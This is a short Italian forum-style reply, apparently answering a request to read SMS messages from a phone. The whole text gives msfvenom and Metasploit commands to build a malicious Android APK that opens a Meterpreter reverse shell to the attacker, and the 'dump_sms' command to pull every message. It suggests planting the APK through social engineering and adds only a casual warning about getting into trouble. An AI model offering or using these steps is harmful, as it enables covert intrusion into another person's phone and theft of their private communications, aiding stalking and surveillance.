Ciao, potresti fare una cosa del genere:
dalla shell:
msfvenom -p android/meterpreter/reverse_tcp lhost=iplocale lport=porta> shell.apk
apri metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost iplocale
set lport porta
exploit
comunque, una volta avuto accesso al telefono, tramite il comando "dump_sms" dovresti riuscire a scaricare tutti gli SMS presenti.
penso sia un metodo generale perchè si tratta di inserire un file apk all'interno del telefono, magari ci riesci con un po di ingegneria sociale e hai fatto.
attento a non metterti nei guai, ciao bello.